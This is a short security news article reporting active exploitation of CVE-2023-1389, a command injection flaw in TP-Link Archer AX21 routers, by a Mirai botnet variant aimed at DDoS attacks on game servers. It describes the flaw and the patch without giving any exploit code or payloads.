Attackers are actively exploiting the CVE-2023-1389 vulnerability in the TP-Link Archer A21 (AX1800) Wi-Fi routers, which was discovered at the Pwn2Own hacker competition in December of last year. Compromised devices are being used to launch DDoS attacks.
The vulnerability was first demonstrated at Pwn2Own Toronto 2022, when two separate teams were able to gain access to the LAN and WAN interfaces of the device. TP-Link developers released firmware 1.1.4 Build 20230219 in March 2023 to address the issue.
According to the Trend Micro Zero Day Initiative (ZDI), who organize Pwn2Own, attempts to exploit this bug began on April 11, 2023, initially targeting devices in Eastern Europe before spreading around the world.
CVE-2023-1389 (CVSS score of 8.8) is an unauthenticated command injection vulnerability in the locale of the web interface API of TP-Link Archer AX21 routers. The source of the problem is the lack of input sanitization, which allows remote attackers to inject commands that will eventually be executed on the device.
Hackers can exploit the vulnerability by sending a specially crafted request to the router containing the payload as a country parameter, followed by a second request that results in the execution of a command.
ZDI reports that the Mirai botnet is currently exploiting the vulnerability to gain access to devices. The malware then downloads a payload appropriate for the architecture of the router to include the device in the botnet. This particular version of Mirai is focused on organizing DDoS attacks on game servers, and has the ability to launch attacks on the Valve Source Engine (VSE).
This version of Mirai is also able to imitate legitimate network traffic, making it difficult for security solutions to distinguish between malicious and normal traffic.
